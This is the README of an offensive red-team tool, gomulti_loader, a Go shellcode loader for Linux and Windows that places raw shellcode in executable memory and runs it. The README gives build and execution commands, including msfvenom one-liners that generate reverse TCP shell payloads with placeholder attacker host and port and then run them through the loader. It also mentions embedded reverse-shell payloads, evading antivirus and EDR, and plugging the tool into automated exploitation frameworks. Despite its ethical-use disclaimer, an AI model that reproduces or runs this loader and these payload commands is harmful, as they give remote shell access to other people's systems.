go run . -shellcode shellcode_linux.txt
This project is a multi-platform shellcode loader written in Go using CGO to interface with native system calls. It supports both Linux and Windows operating systems and can execute raw shellcode from a file formatted with \x## byte notation (e.g., \x48\x31\xc0).
The loader reads shellcode from a text file, allocates executable memory, copies the shellcode into that memory, and executes it.
- β Cross-platform support:
- Linux: Uses mmap() for executable memory allocation.
- Windows: Uses VirtualAlloc() with PAGE_EXECUTE_READWRITE.
- π Flexible input: Parses shellcode in \x## format from plaintext files.
- π§ Simple CLI interface: Accepts path to shellcode file via command-line flag.
- βοΈ Build automation: Makefile-style build instructions included for both platforms.
- amd64 (x86_64) only
- OS: Linux or Windows
πΉ For Linux:
GOOS=linux GOARCH=amd64 go build -o loader_linux
πΉ For Windows: Ensure you have mingw-w64 installed (e.g., x86_64-w64-mingw32-gcc):
GOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc go build -o loader_windows.exe
π‘ Note: CGO is required for Windows due to use of kernel32.dll functions.
π§Ή Clean Build Artifacts:
rm -f loader_linux loader_windows.exeUsage
# On Linux
./loader_linux -shellcode /path/to/shellcode.txt
# On Windows
loader_windows.exe -shellcode C:\path\to\shellcode.txt
Example Shellcode File Format:
\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05...
Any text file containing shellcode in \x## format is supported. The parser extracts all valid \x## sequences regardless of formatting or line breaks.
How It Works
Reads the shellcode file.
Parses all \x## hex byte values into a byte array.
Allocates executable memory using OS-specific APIs:
Linux β mmap()
Windows β VirtualAlloc()
Copies shellcode into allocated memory.
Executes the shellcode by calling it as a function.
Two example payloads are embedded in the source:
- Linux (64-bit): Reverse TCP shell (connects to IP:port)
msfvenom -p linux/x64/shell_reverse_tcp LHOST={lhost} LPORT={lport} -f c -o shellcode_test.txt ; ./loader_linux -shellcode shellcode_test.txt
- Windows (64-bit): Reflective DLL injection / reverse meterpreter-style payload (via ws2_32.dll and cmd execution)
msfvenom -p windows/x64/shell_reverse_tcp LHOST={lhost} LPORT={lport} -f c -o shellcode_test.txt ; powershell .\loader_windows.exe -shellcode shellcode_test.txt
These are provided for testing and demonstration.
Purpose and Scope This document covers how gomulti_loader integrates with external exploitation frameworks and automation systems. The integration system allows external tools to automatically configure, build, and execute the shellcode loader with dynamically generated payloads. This capability enables gomulti_loader to function as a component within larger penetration testing suites and automated exploitation frameworks.
For information about the core shellcode loading functionality, see Core Shellcode Loader System. For details about the build system that supports framework integration, see Build System.
The external framework integration system uses a YAML-based configuration approach that defines how external tools can interact with gomulti_loader. The integration supports parameter-driven payload generation and automated execution workflows.
This program requires no external dependencies beyond standard system libraries. The use of mmap and VirtualAlloc with EXECUTE permissions may trigger AV/EDR detection. Shellcode must be properly encoded and null-free depending on delivery context.
π€ grisuno Security Researcher & LazyOwn Red Team Developer
π This tool is designed for educational and ethical use only. Unauthorized use of this software to exploit systems without permission is illegal and unethical. The authors assumes no liability for misuse.
π This library was made for academic purposes only. The authors are not responsible for what is given to this library and therefore we are exempt from any liability arising from the misuse of it.
Use responsibly and in compliance with all applicable laws and regulations.
GPLV3
The GPL v3 license provides the following fundamental freedoms as outlined in
- Freedom to distribute copies of free software
- Freedom to receive source code or obtain it on request
- Freedom to change the software or use pieces in new programs
- Freedom to know these rights are guaranteed
- [+] CGOblin the big brother of gomulti_loader: https://github.com/grisuno/cgoblin
- [+] Shorts: https://www.youtube.com/shorts/kPZvVV_RNIE
- [+] Deepwiki: https://deepwiki.com/grisuno/gomulti_loader/1-overview
- [+] Github: https://github.com/grisuno/LazyOwn
- [+] Web: https://grisuno.github.io/LazyOwn/
- [+] Reddit: https://www.reddit.com/r/LazyOwn/
- [+] Facebook: https://web.facebook.com/profile.php?id=61560596232150
- [+] HackTheBox: https://app.hackthebox.com/teams/overview/6429
- [+] Grisun0: https://app.hackthebox.com/users/1998024
- [+] Patreon: https://patreon.com/LazyOwn
- [β] Download: https://github.com/grisuno/LazyOwn/archive/refs/tags/release/0.2.47.tar.gz
